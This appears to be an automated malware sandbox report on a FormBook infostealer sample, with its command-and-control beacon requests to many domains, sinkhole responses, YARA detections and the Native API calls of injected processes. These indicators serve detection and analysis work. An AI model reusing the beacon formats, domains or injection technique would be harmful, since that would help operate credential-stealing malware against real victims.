          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:17:53 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.77.226.209 45.77.226.209
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.herbmedia.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: explorer.exe, 00000006.00000003.291409665.00000000089DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmpString found in binary or memory: http://logo.verisign
          Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004181BA NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041826A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054095F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054096D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054099D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054098A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0540A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05409A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E597A0 NtUnmapViewOfSection,
